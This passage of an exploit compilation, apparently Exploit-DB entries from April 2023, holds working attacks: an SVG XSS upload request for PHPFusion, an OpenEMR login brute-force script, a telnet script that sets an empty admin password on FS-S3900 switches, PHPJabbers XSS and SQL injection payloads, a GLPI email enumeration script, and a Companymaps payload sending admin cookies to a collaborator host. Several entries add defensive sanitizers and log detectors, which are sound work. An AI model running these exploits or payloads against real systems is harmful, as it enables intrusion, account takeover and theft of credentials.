   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

poc request:

POST /PHPFusion%209.10.30/files/includes/elFinder/php/connector.php?aid=ecf01599cf9cd553 HTTP/1.1
Host: localhost
Content-Length: 1198
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-platform: "Linux"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxF2jB690PpLWInAA
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fusion2847q_lastvisit=1682673668; fusion2847q_user=1.1682850094.7126692a74723afe3bc7e3fb130a60838c1aa1bcae83f7497402ce9f009f96ff; fusion2847q_admin=1.1682850118.14c483fed28d5a89734c158bbb9aa88eab03a5c4a97316c372dd3b2591d6982a; fusion2847q_session=q0ifs4lhqt9fm6h3jclbea79vf; fusion2847q_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0
Connection: close

------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="reqid"

187c77be8e52cf
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="cmd"

upload
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="target"

l1_Lw
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="hashes[l1_U1ZHX1hTUy5zdmc]"

SVG_XSS.svg
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="mtime[]"

1681116842
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="overwrite"

0
------WebKitFormBoundaryxF2jB690PpLWInAA--

3. Then go to images (http://localhost/PHPFusion%209.10.30/files/administration/images.php?aid=ecf01599cf9cd553) or directly to the svg file (http://localhost/PHPFusion%209.10.30/files/images/SVG_XSS.svg)

poc video : https://youtu.be/6yBLnRH8pOY
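The upload above is accepted because the file manager treats `image/svg+xml` like any other image, and SVG is an XML document that may carry a `<script>` element. The following added example (not PHPFusion or elFinder code) is a server-side gate that parses an uploaded SVG and rejects active content, plus the response headers that keep even an accepted SVG from running as a page when fetched directly. The malicious sample is the file from the report; the clean sample and the `onload` fixture are constructed.

```python
# Added example: inspecting an SVG upload for script, handlers and script URLs.
import xml.etree.ElementTree as ET

# SVG from the advisory above (alert(document.location) inside <script>).
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>"""

# Constructed: the same drawing without the script.
CLEAN_SVG = b"""<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>"""

# Constructed: no <script> element, but an event-handler attribute on the root.
HANDLER_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="run()"><rect width="1" height="1"/></svg>'

# Elements that embed script or foreign documents. Assumed policy for this demo.
_BLOCKED_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
_SCRIPT_SCHEMES = ("javascript:", "data:")


def _local(qualified: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tags and attributes."""
    return qualified.rsplit("}", 1)[-1].lower()


def svg_active_content(data: bytes) -> list:
    """Return the reasons an SVG is unsafe to serve inline; an empty list means clean."""
    reasons = []
    try:
        root = ET.fromstring(data)  # expat does not fetch the external DTD
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if _local(root.tag) != "svg":
        reasons.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        name = _local(el.tag)
        if name in _BLOCKED_ELEMENTS:
            reasons.append(f"<{name}> element")
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if aname.startswith("on"):
                reasons.append(f"{aname} handler on <{name}>")
            elif aname == "href" and value.strip().lower().startswith(_SCRIPT_SCHEMES):
                reasons.append(f"href with {value.split(':', 1)[0]}: URL on <{name}>")
    return reasons


def is_svg_acceptable(data: bytes) -> bool:
    return not svg_active_content(data)


def download_headers(filename: str) -> dict:
    """Headers for serving stored SVGs: force a download and forbid script even if
    a file slips past the gate. Assumed header set, not PHPFusion's."""
    return {
        "Content-Type": "image/svg+xml",
        "Content-Disposition": f'attachment; filename="{filename}"',
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_SVG), ("clean", CLEAN_SVG), ("handler", HANDLER_SVG)):
        print(label, "->", svg_active_content(blob) or "ok")
```

Rejecting at upload and serving with a restrictive policy are complementary: the parser catches the file shown in the report, while `Content-Disposition: attachment` and the CSP make a directly fetched `/files/images/SVG_XSS.svg` a download rather than an executing document in the administrator's browser. Referencing the file from an `<img>` tag is unaffected, because browsers never execute script in an SVG loaded as an image.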
-
Advanced Host Monitor v12.56 - Unquoted Service Path
# Exploit Title: Advanced Host Monitor v12.56 - Unquoted Service Path
# Date: 2023-04-23
# CVE: CVE-2023-2417
# Exploit Author: MrEmpy
# Vendor Homepage: https://www.ks-soft.net
# Software Link: https://www.ks-soft.net/hostmon.eng/downpage.htm
# Version: > 12.56
# Tested on: Windows 10 21H2

Title:
================
Advanced Host Monitor > 12.56 - Unquoted Service Path

Summary:
================
An unquoted service path vulnerability has been discovered in Advanced Host Monitor version > 12.56 affecting the executable "C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe". This vulnerability occurs when the service's path is misconfigured, allowing an attacker to run a malicious file instead of the legitimate executable associated with the service.

An attacker with local user privileges could exploit this vulnerability to replace the legitimate RMA-Win\rma_active.exe service executable with a malicious file of the same name located in a directory that has a higher priority than the legitimate directory. That way, when the service starts, it will run the malicious file instead of the legitimate executable, allowing the attacker to execute arbitrary code, gain unauthorized access to the compromised system, or stop the service from functioning.

To exploit this vulnerability, an attacker would need local access to the system and the ability to write and replace files on the system. The vulnerability can be mitigated by correcting the service path to correctly quote the full path of the executable, including quotation marks. Furthermore, it is recommended that users keep software updated with the latest security updates and limit physical and network access to their systems to prevent malicious attacks.

Proof of Concept:
================
C:\>sc qc ActiveRMAService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ActiveRMAService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe /service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : KS Active Remote Monitoring Agent
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
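The Wondershare Filmora and Advanced Host Monitor reports above are the same class of finding, and both show the `sc qc` output that reveals it. The following added example (not code from either advisory) turns that output into an audit result: it parses the fields, decides whether the image path is unquoted and contains spaces, lists the directories whose ACLs must deny write access to standard users while the path stays unquoted, and builds the `sc config ... binPath=` command that applies the quoting fix the Host Monitor summary recommends. The sample input is the Host Monitor advisory's own `sc qc` listing; the field regex and the helper names are the example's assumptions.

```python
# Added example: auditing an `sc qc` listing for an unquoted service image path.
import re

# Copied from the Advanced Host Monitor advisory above.
SAMPLE_SC_QC = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ActiveRMAService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe /service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : KS Active Remote Monitoring Agent
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

_FIELD_RE = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$")


def parse_sc_qc(text: str) -> dict:
    """Turn `sc qc` output into {FIELD: value}; SERVICE_NAME is included."""
    fields = {}
    for line in text.splitlines():
        m = _FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def split_image_path(binary_path: str):
    """Return (executable, arguments, was_quoted) as the service manager reads binPath.
    For an unquoted path the executable is assumed to end at the first '.exe'."""
    s = binary_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end], s[end + 1:].strip(), True
    m = re.search(r"\.exe\b", s, re.IGNORECASE)
    if not m:
        return s, "", False
    return s[:m.end()], s[m.end():].strip(), False


def directories_to_audit(exe: str) -> list:
    """Directories in which Windows would look for a shorter '<prefix>.exe' before the
    real image while the path is unquoted; each must deny create/write to non-admins."""
    parts = exe.split(" ")
    dirs = []
    for i in range(1, len(parts)):
        probe = " ".join(parts[:i]) + ".exe"
        d = probe.rsplit("\\", 1)[0] + "\\"
        if d not in dirs:
            dirs.append(d)
    return dirs


def audit_service(sc_qc_output: str) -> dict:
    f = parse_sc_qc(sc_qc_output)
    exe, args, quoted = split_image_path(f.get("BINARY_PATH_NAME", ""))
    unquoted = (not quoted) and (" " in exe)
    result = {
        "service": f.get("SERVICE_NAME", "?"),
        "exe": exe,
        "unquoted_with_spaces": unquoted,
        "runs_as": f.get("SERVICE_START_NAME", "?"),
        "auto_start": "AUTO_START" in f.get("START_TYPE", ""),
        "audit_dirs": directories_to_audit(exe) if unquoted else [],
        "fix_command": "",
    }
    if unquoted:
        # Inner quotes are escaped as \" so cmd.exe hands them through to sc.exe.
        fixed = f'\\"{exe}\\"' + (f" {args}" if args else "")
        result["fix_command"] = f'sc config "{result["service"]}" binPath= "{fixed}"'
    return result


if __name__ == "__main__":
    for key, value in audit_service(SAMPLE_SC_QC).items():
        print(f"{key}: {value}")
```

For the Host Monitor listing this reports `C:\` as the directory to review, which standard users cannot write to on a default install; for the Wondershare listing it would report the user-writable `C:\Users\<user>\AppData\Local\Wondershare\`, which is exactly why that case is exploitable without any extra permission. A service that is both AUTO_START and `LocalSystem`, as both are, is the highest-impact combination.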
-
OpenEMR v7.0.1 - Authentication credentials brute force
# Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force
# Date: 2023-04-28
# Exploit Author: abhhi (Abhishek Birdawade)
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz
# Version: 7.0.1
# Tested on: Windows

'''
Example Usage:
- python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt
'''

import requests
import sys
import argparse, textwrap
from pwn import *

#Expected Arguments
parser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass",
                                 formatter_class=argparse.RawTextHelpFormatter,
                                 epilog=textwrap.dedent('''
Exploit Usage :
python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txt
python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txt
python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt'''))
parser.add_argument("-l","--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)")
parser.add_argument("-u","--username", help="Username to Bruteforce for.")
parser.add_argument("-ul","--userlist", help="Username Dictionary")
parser.add_argument("-p","--passlist", help="Password Dictionary")
args = parser.parse_args()

if len(sys.argv) < 2:
    print (f"Exploit Usage: python3 exploitBF.py -h")
    sys.exit(1)

# Variable
LoginPage = args.url
Username = args.username
Username_list = args.userlist
Password_list = args.passlist

log.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ')

def login(Username,Password):
    session = requests.session()
    r = session.get(LoginPage)

    # Progress Check
    process = log.progress('Brute Force')

    #Specifying Headers Value
    headerscontent = {
        'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Referer' : f"{LoginPage}",
        'Origin' : f"{LoginPage}",
    }

    #POST REQ data
    postreqcontent = {
        'new_login_session_management' : 1,
        'languageChoice' : 1,
        'authUser' : f"{Username}",
        'clearPass' : f"{Password}"
    }

    #Sending POST REQ
    r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)

    #Printing Username:Password
    process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))

    #Conditional loops
    if 'Location' in r.headers:
        if "/interface/main/tabs/main.php" in r.headers['Location']:
            print()
            log.info(f'SUCCESS !!')
            log.success(f"Use Credential -> {Username}:{Password}")
            sys.exit(0)

#Reading User.txt & Pass.txt files
if Username_list:
    userfile = open(Username_list).readlines()
    for Username in userfile:
        Username = Username.strip()
        passfile = open(Password_list).readlines()
        for Password in passfile:
            Password = Password.strip()
            login(Username,Password)
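The script above opens a fresh `requests.session()` for every attempt, so any attempt counter the application keeps in the PHP session never climbs, which is the "mitigation bypass" in its name. A counter keyed on the client and on the account, kept outside the session, does not have that weakness. The following added example (not OpenEMR code) is a sliding-window detector over web-server log lines in a simplified constructed format that shows the traffic pattern the script produces: repeated POSTs to the login page that are re-rendered with 200, then a 302 to `tabs/main.php` on success. The log lines, the 60-second window and the threshold of 5 are the example's own choices.

```python
# Added example: flagging login brute force and a success that follows a burst.
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/interface/main/main_screen.php"
SUCCESS_STATUS = "302"          # OpenEMR redirects to tabs/main.php on success
WINDOW = timedelta(seconds=60)  # assumed
THRESHOLD = 5                   # assumed

# Constructed log lines: "<iso time> <client ip> <method> <path> <status>".
# 10.0.0.5 fails five times in under a minute and then succeeds; 10.0.0.9 is a user
# who mistypes once and then logs in.
SAMPLE_LOG = """\
2023-04-28T10:00:01 10.0.0.5 POST /interface/main/main_screen.php?auth=login&site=default 200
2023-04-28T10:00:02 10.0.0.9 POST /interface/main/main_screen.php?auth=login&site=default 200
2023-04-28T10:00:03 10.0.0.5 POST /interface/main/main_screen.php?auth=login&site=default 200
2023-04-28T10:00:05 10.0.0.5 POST /interface/main/main_screen.php?auth=login&site=default 200
2023-04-28T10:00:06 10.0.0.9 POST /interface/main/main_screen.php?auth=login&site=default 302
2023-04-28T10:00:07 10.0.0.5 POST /interface/main/main_screen.php?auth=login&site=default 200
2023-04-28T10:00:09 10.0.0.5 POST /interface/main/main_screen.php?auth=login&site=default 200
2023-04-28T10:00:10 10.0.0.5 GET /interface/main/main_screen.php?auth=login&site=default 200
2023-04-28T10:00:12 10.0.0.5 POST /interface/main/main_screen.php?auth=login&site=default 302
"""


def detect_bruteforce(lines, threshold=THRESHOLD, window=WINDOW) -> list:
    """Return (ip, time, message) alerts for failed-login bursts per client and for
    a successful login by a client that was already flagged."""
    failures = defaultdict(deque)   # ip -> timestamps of failures inside the window
    flagged = set()
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ts_text, ip, method, path, status = line.split()
        if method != "POST" or not path.startswith(LOGIN_PATH):
            continue
        ts = datetime.fromisoformat(ts_text)
        recent = failures[ip]
        while recent and ts - recent[0] > window:
            recent.popleft()          # drop failures that fell out of the window
        if status == SUCCESS_STATUS:
            if ip in flagged:
                alerts.append((ip, ts_text, "login success after burst: treat the account as likely compromised"))
            continue
        recent.append(ts)
        if len(recent) >= threshold and ip not in flagged:
            flagged.add(ip)
            alerts.append((ip, ts_text, f"{len(recent)} failed logins within {int(window.total_seconds())}s"))
    return alerts


def demo_alerts() -> list:
    return detect_bruteforce(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for ip, when, msg in demo_alerts():
        print(f"{when} {ip}: {msg}")
```

The same counting logic, keyed on the account name as well as the client address, is what an application-side lockout should use, because a per-session counter is reset by exactly the behaviour the script relies on. The second alert type is the one to act on first: a success immediately after a burst usually means the password was found.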
-
FS-S3900-24T4S - Privilege Escalation
# Exploit Title: FS-S3900-24T4S Privilege Escalation
# Date: 29/04/2023
# Exploit Author: Daniele Linguaglossa & Alberto Bruscino
# Vendor Homepage: https://www.fs.com/
# Software Link: not available
# Version: latest
# Tested on: latest
# CVE : CVE-2023-30350

import sys
import telnetlib


def exploit(args):
    print(args)
    if len(args) != 1:
        print(f"Usage: {sys.argv[0]} <ip>")
        sys.exit(1)
    else:
        ip = args[0]
        try:
            with telnetlib.Telnet(ip, 23) as tn:
                try:
                    tn.read_until(b"Username: ")
                    tn.write(b"guest\r\n")
                    tn.read_until(b"Password: ")
                    tn.write(b"guest\r\n")
                    tn.read_until(b">")
                    tn.write(b"enable\r\n")
                    tn.read_until(b"Password: ")
                    tn.write(b"super\r\n")
                    tn.read_until(b"#")
                    tn.write(b"configure terminal\r\n")
                    tn.read_until(b"(config)#")
                    tn.write(b"username admin nopassword\r\n")
                    tn.read_until(b"(config)#")
                    print("Exploit success, you can now login with username: admin and password: <empty>")
                    tn.close()
                except KeyboardInterrupt:
                    print("Exploit failed")
                    tn.close()
        except ConnectionRefusedError:
            print("Connection refused")


if __name__ == "__main__":
    exploit(sys.argv[1:])
-
PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)
# Exploit Title: PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)
# Date: 2023-04-29
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: 5.0
# Tested on: Kali Linux

### Steps to Reproduce ###

- Please login from this address: https://localhost/simplecms/index.php?controller=pjAdmin&action=pjActionLogin
- Click on the "Add Section" button.
- Then enter the payload ("><img src=x onerror=alert("Stored")>) in the "Section" box and save it.
- Boom! An alert message saying "Stored" will appear in front of you.

### PoC Request ###

POST /simplecms/index.php?controller=pjAdminSections&action=pjActionCreate HTTP/1.1
Host: localhost
Cookie: pj_sid=PJ1.0.6199026527.1682777172; pj_so=PJ1.0.6771252593.1682777172; pjd_1682777220_628=1; PHPSESSID=bmannt0kqjm2m0vmb5vj1dbu57; simpleCMS=ejrnh4bmb0ems1j4e4r9fq4eq1; pjd=7l9bb4ubmknrdbns46j7g5cqn7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 371
Origin: https://localhost
Referer: https://localhost/simplecms/index.php?controller=pjAdminSections&action=pjActionCreate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

section_create=1&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E&i18n%5B2%5D%5Bsection_name%5D=&i18n%5B3%5D%5Bsection_name%5D=&i18n%5B1%5D%5Bsection_content%5D=%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%26gt%3B%3C%2Fp%3E&i18n%5B2%5D%5Bsection_content%5D=&i18n%5B3%5D%5Bsection_content%5D=&url=&status=T
-
Companymaps v8.0 - Stored Cross Site Scripting (XSS)
# Exploit Title: Companymaps V8.0 - Stored Cross Site Scripting (XSS)
# Date: 27.04.2023
# Exploit Author: Lucas Noki (0xPrototype)
# Vendor Homepage: https://github.com/vogtmh
# Software Link: https://github.com/vogtmh/cmaps
# Version: 8.0
# Tested on: Mac, Windows, Linux
# CVE : CVE-2023-29983

*Steps to reproduce:*
1. Clone the repository and install the application.
2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token=
3. The payload used is: <script>new+Image().src=`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}`</script>
4. Simply visiting the complete URL http://IP/rest/update/?token=PAYLOAD is enough.
5. Log in to the admin panel and go to the audit log under /admin/index.php?tab=auditlog
6. Check your collaborator server. You should have a request where the admin's cookie is the value of the c parameter.

In a real-world case you would need to wait for the admin to log into the application and open the audit log tab.

Special thanks go out to iCaotix, who greatly helped me in getting the environment set up as well as debugging my payload.
-
PHPJabbers Simple CMS 5.0 - SQL Injection
# Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection
# Date: 2023-04-29
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: 5.0
# Tested on: Kali Linux

### Request ###

GET /simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10 HTTP/1.1
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://localhost/simplecms/preview.php?lid=1
Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844; _fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292; pjd_simplecms=1; last_position=%2F
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

### Parameter & Payloads ###

Parameter: column (GET)

Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869) THEN 2 ELSE (SELECT 2339 UNION SELECT 4063) END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10

Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: action=pjActionGetFile&column=2 AND EXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT (ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10
-
GLPI 9.5.7 - Username Enumeration
# Exploit Title: GLPI 9.5.7 - Username Enumeration
# Date: 04/29/2023
# Author: Rafael B.
# Vendor Homepage: https://glpi-project.org/pt-br/
# Affected Versions: GLPI version 9.1 <= 9.5.7
# Software: https://github.com/glpi-project/glpi/releases/download/9.5.7/glpi-9.5.7.tgz

import requests
from bs4 import BeautifulSoup

# Send a GET request to the page to receive the CSRF token and the session cookie
response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1')

# Parse the HTML using BeautifulSoup
soup = BeautifulSoup(response.content, 'html.parser')

# Find the input element with the CSRF token
csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')})

# Extract the CSRF token if it exists (None otherwise, so the POST below still runs)
csrf_token = csrf_input['value'] if csrf_input else None

# Extract the session cookie
session_cookie_value = None
if response.cookies:
    session_cookie_value = next(iter(response.cookies.values()))

# Set the custom URL where the GLPI password recovery form is located
url = "http://127.0.0.1:80/glpi/front/lostpassword.php"

headers = {"User-Agent": "Windows NT 10.0",
           "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
           "Accept-Language": "en-US,en;q=0.5",
           "Accept-Encoding": "gzip, deflate",
           "Content-Type": "application/x-www-form-urlencoded",
           "Origin": "http://127.0.0.1",
           "Connection": "close",
           "Referer": "http://127.0.0.1/glpi/front/lostpassword.php?lostpassword=1",
           "Upgrade-Insecure-Requests": "1",
           "Sec-Fetch-Dest": "document",
           "Sec-Fetch-Mode": "navigate",
           "Sec-Fetch-Site": "same-origin",
           "Sec-Fetch-User": "?1"}

# Open the email list file and read each line
with open('emails.txt', 'r') as f:
    email_list = f.readlines()

# Loop through the email list and make a POST request for each email
for email in email_list:
    email = email.strip()
    data = {"email": email, "update": "Save", "_glpi_csrf_token": csrf_token}
    cookies = {"glpi_f6478bf118ca2449e9e40b198bd46afe": session_cookie_value}
    freq = requests.post(url, headers=headers, cookies=cookies, data=data)

    # Do a new GET request to get the updated CSRF token and session cookie for the next iteration
    response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1')
    soup = BeautifulSoup(response.content, 'html.parser')
    csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')})
    if csrf_input:
        csrf_token = csrf_input['value']
    session_cookie_value = None
    if response.cookies:
        session_cookie_value = next(iter(response.cookies.values()))

    # Parse the response and look for the message that confirms a matching e-mail
    soup = BeautifulSoup(freq.content, 'html.parser')
    div_center = soup.find('div', {'class': 'center'})
    if div_center is None:
        continue  # no status message in this response, nothing to check for this address
    Result = f"Email: {email}, Result: {div_center.text.strip()}"
    if "An email has been sent to your email address. The email contains information for reset your password." in Result:
        print("\033[1;32m Email Found! -> " + Result)
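The script above works because the lost-password page answers differently for known and unknown addresses, so the attacker's traffic looks like one client submitting the same form many times in a short period. Added example (not from the advisory or the GLPI project): a small detector that reads web server access logs in the common combined format and flags clients exceeding a number of POSTs to the lost-password form inside a sliding time window. The log lines, addresses and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access log (combined log format). 203.0.113.7 submits
# the lost-password form six times in a few seconds, the shape the
# enumeration script produces; 198.51.100.4 submits it once, as a user would.
SAMPLE_LOG = """\
203.0.113.7 - - [29/Apr/2023:10:00:01 +0000] "GET /glpi/front/lostpassword.php?lostpassword=1 HTTP/1.1" 200 7311 "-" "Windows NT 10.0"
203.0.113.7 - - [29/Apr/2023:10:00:01 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 5120 "-" "Windows NT 10.0"
203.0.113.7 - - [29/Apr/2023:10:00:02 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 5120 "-" "Windows NT 10.0"
203.0.113.7 - - [29/Apr/2023:10:00:02 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 5120 "-" "Windows NT 10.0"
203.0.113.7 - - [29/Apr/2023:10:00:03 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 5120 "-" "Windows NT 10.0"
203.0.113.7 - - [29/Apr/2023:10:00:04 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 5120 "-" "Windows NT 10.0"
203.0.113.7 - - [29/Apr/2023:10:00:04 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 5120 "-" "Windows NT 10.0"
198.51.100.4 - - [29/Apr/2023:10:05:00 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.4 - - [29/Apr/2023:10:05:30 +0000] "POST /glpi/front/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# Client IP, timestamp, method, path and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

LOSTPASSWORD_PATH = "/glpi/front/lostpassword.php"


def parse_line(line):
    """Parse one access log line; return a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],  # drop the query string
        "status": int(m.group("status")),
    }


def find_enumeration(log_text, path=LOSTPASSWORD_PATH, threshold=5,
                     window=timedelta(minutes=5)):
    """Return {ip: count} for every client that sent at least `threshold`
    POSTs to `path` within some interval no longer than `window`."""
    posts_by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == path:
            posts_by_ip[rec["ip"]].append(rec["ts"])

    flagged = {}
    for ip, times in posts_by_ip.items():
        times.sort()
        start, best = 0, 0
        # Sliding window: advance `start` until the span fits in `window`.
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


if __name__ == "__main__":
    for ip, count in find_enumeration(SAMPLE_LOG).items():
        print(f"possible username enumeration from {ip}: {count} lost-password POSTs")
```

Rate-limiting the form and returning the same confirmation text whether or not the address exists remove the signal the script relies on; the detector is useful for the window until such a fix is deployed, and the threshold should be tuned to real traffic on the instance.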
-
KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)
